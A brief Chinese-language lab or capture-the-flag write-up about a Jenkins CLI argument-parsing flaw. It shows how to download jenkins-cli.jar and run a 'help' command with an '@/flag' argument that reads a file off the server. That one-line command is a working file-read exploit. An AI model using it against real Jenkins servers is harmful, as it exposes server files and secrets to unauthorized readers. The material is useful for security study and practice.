严禁用于违法行为,任何使用与作者无关
大佬分析具体信息 ==> 展开 / 收起
我们首先看一下漏洞描述
OK啊!是CLI命令解析问题
我们使用访问http://IP和端口/jnlpJars/jenkins-cli.jar
会下载jenkins-cli.jar文件
再次使用java -jar jenkins-cli.jar -s http://IP和端口/ -http help 1 "@/flag"
再终端就可以看到flag了
具体信息 ==> 展开 / 收起
Comments NOTHING